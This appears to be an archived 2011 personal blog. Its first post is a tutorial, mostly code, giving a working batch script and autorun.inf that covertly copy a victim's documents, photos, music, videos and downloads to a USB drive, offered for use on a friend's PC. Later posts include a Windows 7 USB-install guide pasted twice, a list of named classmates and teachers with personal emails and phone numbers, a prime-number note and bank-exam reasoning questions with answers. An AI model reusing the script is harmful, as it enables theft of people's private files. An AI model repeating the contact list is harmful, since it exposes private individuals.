Saturday, October 8, 2011

Friday, April 1, 2011

Steal Files From Windows7/Vista To USB Drive

Last time I posted a tutorial to copy files from Windows XP. Now if you are sure that your friend’s PC has later version of Windows then this will surely work for it.

I am going to teach you how you can do this from batch file with the help of autorun.inf file.
Let me tell you the basic things what will happen.
When you plug in in your Pen drive, system will look up for autorun.inf (incase if autorun is not disabled for your drive from the system).
Then we’ll input some command in autorun.inf in such a way that it will load the batch file that does the magic of copying all the files from your PC. In this demonstration I am copying only the files and folders in My Documents.
Here goes the batch code:


@echo off
:CHECK
if not exist “%homedrive%\Copied_files” md “%homedrive%\Copied_files”
if exist “%systemdrive%\files” goto COPIER7
goto ERROR
:COPIER7
if not exist “%homedrive%\Copied_files\%computername%” md “%homedrive%\Copied_files\%computername%”
if not exist “%homedrive%\Copied_files\%computername%\VIDEOS” md “%homedrive%\Copied_files\%computername%\VIDEOS”
if not exist “%homedrive%\Copied_files\%computername%\PICTURES” md “%homedrive%\Copied_files\%computername%\PICTURES”
if not exist “%homedrive%\Copied_files\%computername%\MUSIC” md “%homedrive%\Copied_files\%computername%\MUSIC”
if not exist “%homedrive%\Copied_files\%computername%\DOWNLOADS” md “%homedrive%\Copied_files\%computername%\DOWNLOADS”
copy /y “%userprofile%\Documents\*.*” “%homedrive%\Copied_files\%computername%”
copy /y “%userprofile%\Videos” “%homedrive%\Copied_files\%computername%\VIDEOS”
copy /y “%userprofile%\Music” “%homedrive%\Copied_files\%computername%\MUSIC”
copy /y “%userprofile%\Pictures” “%homedrive%\Copied_files\%computername%\PICTURES”
copy /y “%userprofile%\Downloads” “%homedrive%\Copied_files\%computername%\DOWNLOADS”
MSG %username% “DONE!”
exit
:ERROR
exit
 
 
What it actually does is in first case ,CHECK, it checks if your removable storage have folder named, Copied_files or not. If it doesn’t have then it creates one by using MD (Make Directory) command.
Again it checks if you have files folder then it will assume that you are using windows Vista/7. Other wise it will return an error and exits.
Now I’ve defined another two cases after the first case CHECK, that is COPIER7 case and ERROR case.
Case COPIER7 will execute when the program recognizes it is Windows Vista/7, where the real copying work goes on.
Case ERROR will execute when the Documents and Settings doesn’t exists in your system root.
This is just a simple use of Batch programming. Copy the above code and paste it in notepad and save it as Filename.bat.
Now let’s create a file that will load it automatically.


[autorun]
Open=Filename.bat
Action=File Copier


The above code goes in autorun.inf file. Open notepad and copy it and paste it and save as autorun.inf.

Copy the two files, autorun.inf and Filename.bat in your flash drive.
Then plug in your device to your friends PC and do the evil things.
                                                               
                                                                                                                                 by


                                                                 ??19 9 22 1??
 

Sunday, February 27, 2011

How to format laptop using pendrive.....


How to Install Windows 7 using USB Pen Drive – Tutorial


Windows7 USB InstallationWe had written earlier a tutorial on How to Install Windows XP via Pen Drive which was useful for Windows xp based computers, while in this article we will guide you on with a detailed tutorial on how you can easily install the Windows 7 Operating System on your Laptop or Netbook using the USB Drive or Pen Drive. Most of the Latest NetBooks like HP Mini, Dell Mini, Dell Inspiron Mini 10, UbiSurfer Netbook etc come with a Internet HDD, USB Support but no CD / DVD support which makes it hard to transfer files or install software’s using this media.
If you would like to re-install the Windows 7 OS through the next available option to CD / DVD ie through the USB Pen Drive then you will have to first fix a lot of options on the drive in order to make it bootable and run like a normal DVD, allowing you to install the whole Operating System easily.
To get started you will need a Portable Drive with a minimum of 4Gb storage capacity because the OS Installation files itself need around 2-3Gb of space. Next you will have to make sure that you have a Licensed Copy of Windows Vista or Windows 7 in order to complete this installation and make sure that you don’t get any Microsoft Windows Genuine Advantage Notifications.
Once you are ready you will have to make sue that the Command Prompt is having the Permission to Run as Administrator, which can be done by clicking on the Start > All Programs > Accessories > right click on Command Prompt and select the option ‘Run as administrator’. Once this is done you will be able to make any changes on your computer using the cmd.
The next task would be running the CMD prompt and following the instructions listed below one by one carefully in the right order to make sure no mistakes happen.
First you will have to type DISKPART which will start the utility which allows you to edit and manage Disk Partitions all connected to your computer. Connect the USB Drive to your computers USB Port and move to the next step of finding out the disk number.
Under the CMD Prompt, type LIST DISK which will list down all the connected drivers on your computer with the storage capacity which can give you a easy idea in finding out the USB drive.
As you can find in the following screen capture the Disk 1 has a size of 4Gb space which means that the Disk 1 would be used from now on for this whole tutorial.

 

How to Install Windows 7 using USB Pen Drive – Tutorial


Windows7 USB InstallationWe had written earlier a tutorial on How to Install Windows XP via Pen Drive which was useful for Windows xp based computers, while in this article we will guide you on with a detailed tutorial on how you can easily install the Windows 7 Operating System on your Laptop or Netbook using the USB Drive or Pen Drive. Most of the Latest NetBooks like HP Mini, Dell Mini, Dell Inspiron Mini 10, UbiSurfer Netbook etc come with a Internet HDD, USB Support but no CD / DVD support which makes it hard to transfer files or install software’s using this media.
If you would like to re-install the Windows 7 OS through the next available option to CD / DVD ie through the USB Pen Drive then you will have to first fix a lot of options on the drive in order to make it bootable and run like a normal DVD, allowing you to install the whole Operating System easily.
To get started you will need a Portable Drive with a minimum of 4Gb storage capacity because the OS Installation files itself need around 2-3Gb of space. Next you will have to make sure that you have a Licensed Copy of Windows Vista or Windows 7 in order to complete this installation and make sure that you don’t get any Microsoft Windows Genuine Advantage Notifications.
Once you are ready you will have to make sue that the Command Prompt is having the Permission to Run as Administrator, which can be done by clicking on the Start > All Programs > Accessories > right click on Command Prompt and select the option ‘Run as administrator’. Once this is done you will be able to make any changes on your computer using the cmd.
The next task would be running the CMD prompt and following the instructions listed below one by one carefully in the right order to make sure no mistakes happen.
First you will have to type DISKPART which will start the utility which allows you to edit and manage Disk Partitions all connected to your computer. Connect the USB Drive to your computers USB Port and move to the next step of finding out the disk number.
Under the CMD Prompt, type LIST DISK which will list down all the connected drivers on your computer with the storage capacity which can give you a easy idea in finding out the USB drive.
As you can find in the following screen capture the Disk 1 has a size of 4Gb space which means that the Disk 1 would be used from now on for this whole tutorial.
Diskpart Detailed Instructions
The next step would be cleaning the drive which can be accomplished by typing ‘CLEAN‘ in the DiskPart utility which will delete all the contents and make it a blank drive. Following this you will have to type ‘CREATE PARTITION PRIMARY‘ which will make the specific partition a primary one. Type ‘SELECT PARTITION‘ followed by ‘ACTIVE‘ to make the current partition as active.
Once the above steps are done, you will have to proceed towards formatting the drive to NTFS partition which can be done by typing ‘FORMAT FS=NTFS’. This would take around 5-10 minutes of time in order to completely format the whole volume.
Next you will have to insert the Original Windows 7 DVD into your DVD Drive and then note the drive letter from ‘My Computer’ section. In our case it was at E: drive and the USB Drive was located at F: following which you will have to access the Command Prompt and then get into the CD Boot process by entering – CD BOOT following which all the boot files would be updated to the target volume ie the USB Pen Drive.
CMD Create Boot Drive USB
Next you will have to move to the ‘My Computer’ section and then transfer all the files from the Windows 7 DVD to the USB Drive which would take a few minutes because the size is in the range of 2-3Gb.
Copying Files DVD to USB
Once the data is transferred your Bootable Windows 7 Installation drive is ready which you can install right away. Just restart the computer or laptop and then change the boot option from HDD or CD to USB Mode and then proceed with a restart following which the installation would be completed within a few minutes. The whole installation process wont take much time because the data is on the drive which is much faster when compared to a optical drive.

Related Articles in Windows Blog

Thursday, January 13, 2011

Details of my tenth Classmates...











Hai friends...
This is B.Raja siva kumar...every body known me by raj siva,here i added some of our frds and teachers details....if u have any body deatils that are not in the below list please inform to me and if you want to change ur details inform to me....

-Ur's ??19 9 22 1??
1.B.Raja siva kumar
Email id:siva.anjali.kumar@gmail.com
sivakumar_799@rediff.com
siva_kumar0991@yahoo.com
PH:9493326140.

2.A.Koteshwar Rao
Email id:kotesh.devger@gmail.com
PH: 8106025583

3.K.Sai ramana
PH:9441096927.

4.N.V.Mahipal
Email id:mahi.Narla@gmail.com,
PH:9492406583.

5.M.Inthaiaz Ahammmed
Email id:inthis77@gmail.com,
PH:9010386642.

6.Talari Chandra Babu
Email id:chanu.AGB.Sc@gmail.com
PH:9014960523.


7.CH.Eswar Rao
Email id:eswar@yahoo.in,
PH:9676329304.

8.P.Naveen
Email id:naveen556@gmail.com,
PH:9885733833.


9.S.Ravi kumar reddy
Email id:ravi8061@gmail.com,
PH:8099277441.

10.Y.Raghava Reddy
PH:9951522595.


11.T.Siva kumar Reddy
Email id:shivakumarreddy.t@gmail.com,
PH:9949025624.


12.V.siva sndeep Reddy
Email id:VSSRILU@gmail.com,
PH:9885800535.


13.CH.Kotesh rao
PH:9949649561.


14.Anusha Suryas
Email id:anu.suryas@gmail.com.

15.M.Maheswari
PH:9866804907.


16.B.kalyani
Email id:kalyani096@gmail.com.

17.A.V.Naga prasanthi
Email id:luckyshanti.prasanthi@gmail.com.

18.G.Bhanu latha

19.S.Raghunath Reddy
Email id:ragahubava444@gmail.com,
PH:8106828129.


20.N.V.RamaKanth Reddy
Email id:ramakanthnv@gmail.com,
PH:9030232393.


21.T.Devendra kumar
Email id:dktalupula@gmail.com
PH:08123563242.

22.S.mohammad Rafi
PH:9703574733.


23.B.Harivardhan reddy
Email id:hari.thedamn@gmail.com
PH:8121251474.

24.Tharak
PH:9000125120,9030980792

25.K.Partha Saradhi Reddy
Email id:saradi630@gmail.com,
PH:9739212630.


26.T.Lakshmi Reddy sir
PH:9866954385.


27.D.sudheer sir
Email id:sudheerDesai02@yahoo.com,
PH:9908793513.

28.P.SivaSankar sir
PH:9490999760.


29.A.Jagan MOhan Sir
Email id:ajagan03@gmail.com,
PH: 9177322246.


30.D.Madhu sir
PH:7396741527 , 9642604743.

31.B.V.subba reddy sir
PH:9490210592.

32.Chetan
PH:8985034328

Tuesday, January 4, 2011

about 2011

2011 - A Prime Year
This year, 2011, has at least two special properties as a number.

First of all, 2011 is a prime number.

Second, 2011 is the sum of 11 consecutive prime numbers:-

2011=157+163+167+173+179+181+191+193+197+199+211

It is also, separately, the sum of three consecutive primes:-

2011=661+673+677

I have been away for a time, but I have kept on studying VM during this time. 2011 promises to be a very interesting year for me, and VM will feature very strongly - both as a topic I am studying and as something I shall be looking to promote.

Monday, January 3, 2011

about me

hai am B.Raja siva kumar from nandyal,kurnool(Dt).A.P
i prepare thiz blog to share my views all of u....
am much intrested in network security

sbi reasoning

SBI - Clerk Reasoning Exam 2009
Reasoning
 
Join our Orkut Community & Share Bank Exam tips / Model papers
Visit www.bankexamsindia.com for latest Job Alerts/Job Exams
 
1. If it is possible to make only one meaningful word with the Third, Seventh, Eighth and Tenth letters of the word COMPATIBILITY, which of the following would be the last letter of that word ? If no such word can be made, give ‘X’ as your answer and if more than one such word can be formed, give your answer as ‘Y’.
(A) I
(B) B
(C) L
(D) X
(E) Y
Ans : (B)

2. Four of the following five are alike in a certain way and so form a group. Which is the one that does not belong to that group ?
(A) Stem
(B) Tree
(C) Root
(D) Branch
(E) Leaf
Ans : (B)

3. How many meaningful three letter English words can be formed with the letters AER, using each letter only once in each word ?
(A) None
(B) One
(C) Two
(D) Three
(E) Four
Ans : (D)

4. In a certain code FINE is written HGPC.
How is SLIT written in that code ?
(A) UTGR
(B) UTKR
(C) TUGR
(D) RUGT
(E) None of these
Ans : (E)

5. If ‘Apple’ is called ‘Orange’, ‘Orange’ is called ‘Peach’, ‘Peach’ is called ‘Potato’, ‘Potato’ is called ‘Banana’, ‘Banana’ is called ‘Papaya’ and ‘Papaya’ is called ‘Guava’, which of the following grows underground ?
(A) Potato
(B) Guava
(C) Apple
(D) Banana
(E) None of these
Ans : (D)

6. If the digits in the number 86435192 are arranged in ascending order, what will be the difference between the digits which are second from the right and fourth from the left in the new arrangement ?
(A) One
(B) Two
(C) Three
(D) Four
(E) None
Ans : (D)

7. Each vowel of the word ADJECTIVE is substituted with the next letter of the English alphabetical series, and each consonant is substituted with the letter preceding it. How many vowels are present in the new arrangement ?
(A) None
(B) One
(C) Two
(D) Three
(E) None of these
Ans : (C)

8. If in a certain language LATE is coded as 8&4$ and HIRE is coded as 7*3$ then how will HAIL be coded in the same language ?
(A) 7&8*
(B) &7*8
(C) 7*&8
(D) 7&*8
(E) None of these
Ans : (D)

9. How many such pairs of letters are there in word ENGLISH, each of which has as many letters between its two letters as there are between them in the English alphabets ?
(A) None
(B) One
(C) Two
(D) Three
(E) More than three
Ans : (E)

10. In a certain code ‘na pa ka so’ means ‘birds fly very high’, ‘ri so la pa’ means ‘birds are very beautiful’ and ‘ti me ka bo’ means ‘the parrots could fly’. Which of the following is the code for ‘high’ in that language ?
(A) na
(B) ka
(C) bo
(D) so
(E) None of these
Ans : (A)

Directions—(Q. 11–15) In each of the questions below are given three statements followed by two conclusions numbered I and II. You have to take the given statements to be true even if they seem to be at variance from commonly known facts. Read both the conclusions and then decide which of the given conclusions logically follows from the given statements disregarding commonly known facts.

Read the statements and the conclusions which follow it and
Give answer—
(A) if only conclusion I is true.
(B) if only conclusion II is true.
(C) if either conclusion I or conclusion II is true.
(D) if neither conclusion I nor conclusion II is true
(E) if both conclusions I and II are true.

11. Statements : All stars are suns.
Some suns are planets.
All planets are satellites.
Conclusions :
I. Some satellites are stars.
II. No star is a satellite.
Ans : (C)

12. Statements : All fishes are birds.
All birds are rats.
All rats are cows.
Conclusions :
I. All birds are cows
II. All rats are fishes
Ans : (A)

13. Statements : All curtains are rods.
Some rods are sheets.
Some sheets are pillows.
Conclusions :
I. Some pillows are rods.
II. Some rods are curtains.
Ans : (B)
14. Statements : Some walls are windows.
Some windows are doors.
All doors are roofs.
Conclusions :
I. Some doors are walls.
II. No roof is a window.
Ans : (D)

15. Statements : All switches are plugs.
Some plugs are bulbs.
All bulbs are sockets.
Conclusions :
I. Some sockets are plugs.
II. Some plugs are switches.
Ans : (E)

Directions—(Q. 16–20) Study the sets of numbers given below and answer the questions, which follow :
489 - 541 - 654 - 953 - 983

16. If in each number, the first and the last digits are interchanged, which of the following will be the second highest number ?
(A) 489
(B) 541
(C) 654
(D) 953
(E) 783
Ans : (C)

17. If in each number, all the three digits are arranged in ascending order, which of the following will be the lowest number ?
(A) 489
(B) 541
(C) 654
(D) 953
(E) 783
Ans : (B)

18. Which of the following numbers will be obtained if the first digit of lowest number is subtracted from the second digit of highest number after adding one to each of the numbers ?
(A) 1
(B) 2
(C) 3
(D) 4
(E) 5
Ans : (A)

19. If five is subtracted from each of the numbers, which of the following numbers will be the difference between the second digit of second highest number and the second digit of the highest number ?
(A) Zero
(B) 3
(C) 1
(D) 4
(E) 2
Ans : (B)

20. If in each number the first and the second digits are interchanged, which will be the third highest number ?
(A) 489
(B) 541
(C) 654
(D) 953
(E) 783
Ans : (D)

Directions—(Q. 21–25) Read the following information carefully and answer the questions, which follow :
‘A – B’ means ‘A is father of B’
‘A + B’ means ‘A is daughter of B’
‘A ÷ B’ means ‘A is son of B’
‘A × B’ means ‘A is wife of B’

21. Which of the following means P is grandson of S ?
(A) P + Q – S
(B) P ÷ Q × S
(C) P ÷ Q + S
(D) P × Q ÷ S
(E) None of these
Ans : (C)

22. How is P related to T in the expression ‘P + S – T’ ?
(A) Sister
(B) Wife
(C) Son
(D) Daughter
(E) None of these
Ans : (A)

23. In the expression ‘P + Q × T’ how is T related to P ?
(A) Mother
(B) Father
(C) Son
(D) Brother
(E) None of these
Ans : (B)

24. Which of the following means T is wife of P ?
(A) P × S ÷ T
(B) P ÷ S × T
(C) P – S ÷ T
(D) P + T ÷ S
(E) None of these
Ans : (E)

25. In the expression ‘P × Q – T’ how is T related to P ?
(A) Daughter
(B) Sister
(C) Mother
(D) Can’t be determined
(E) None of these
Ans : (D)

Directions—(Q. 26–30) In each of these questions a group of letters is given followed by four combinations of number/symbol lettered (A), (B), (C) & (D). Letters are to be coded as per the scheme and conditions given below. You have to find out the serial letter of the combination, which represents the letter group. Serial letter of that combination is your answer. If none of the combinations is correct, your answer is (E) i.e. None of these :

Letters# Q M S I N G D K A L P R B J E
Number/ Symbol# 7 @ 4 # % $ 6 1 2 £ 5 * 9 8 3

Conditions :
(i) If the first letter is a consonant and the last a vowel, both are to be coded as the code of the vowel.
(ii) If the first letter is a vowel and the last a consonant, the codes for the first and the last are to be interchanged.
(iii) If no vowel is present in the group of letters, the second and the fifth letters are to be coded as ©.

26. BKGQJN
(A) 9©$7©%
(B) ©9$7%©
(C) 91$78%
(D) %1$789
(E) None of these
Ans : (A)

27. IJBRLG
(A) #89*£$
(B) #89*£#
(C) $89*£#
(D) $89*£$
(E) None of these
Ans : (C)

28. BARNIS
(A) 92*#%4
(B) 924#*%
(C) 92*#%9
(D) 42*#%4
(E) None of these
Ans : (E)

29. EGAKRL
(A) #£$21*
(B) £$21*3
(C) £$21*#
(D) #£$21#
(E) None of these
Ans : (B)

30. DMBNIA
(A) 6@9%#2
(B) 2@9%#6
(C) 2@9%#2
(D) 2©9%#2
(E) None of these
Ans : (C)

Directions—(Q. 31–35) Study the following information carefully to answer these questions.
Eight persons A, B, C, D, E, F, G and H work for three different companies namely X, Y and Z. Not more than three persons work for a company. There are only two ladies in the group who have different specializations and work for different companies. Of the group of friends, two have specialization in each HR, Finance and Marketing. One member is an engineer and one is a doctor. H is an HR specialist and works with a Marketing specialist B who does not work for company Y. C is an engineer and his sister works in company Z. D is a specialist in HR working in company X while her friend G is a finance specialist and works for company Z. No two persons having the same specialization work together. Marketing specialist F works for company Y and his friend A who is a Finance expert works for company X in which only two specialists work. No lady is a marketing specialist or a doctor.

31. For which of the following companies does C work ?
(A) Y
(B) X
(C) Z
(D) Data inadequate
(E) None of these
Ans : (A)

32. Which of the following represents the pair working in the same company ?
(A) D and C
(B) A and B
(C) A and E
(D) H and F
(E) None of these
Ans : (E)

33. Which of the following combination is correct ?
(A) C–Z-Engineer
(B) E–X–Doctor
(C) H–X–HR
(D) C–Y–Engineer
(E) None of these
Ans : (D)

34. Who amongst the friends is a doctor ?
(A) H
(B) E
(C) C
(D) Either E or C
(E) None of these
Ans : (B)

35. Which of the following pairs represents the two ladies in the group ?
(A) A and D
(B) B and D
(C) D and G
(D) Data inadequate
(E) None of these
Ans : (C)

Directions—(Q. 36–40) In each of the questions given below which one of the five answer figures on the right should come after the problem figures on the left, if the sequence were continued ?
Ans : 36. (C) 37. (E) 38. (D) 39. (A) 40. (D)
 
* SBI PO Exam Guide (with Solved Papers) - Rs.351 - Buy Online

* Visit www.bankexamsindia.com for latest Job Alerts/Job Exams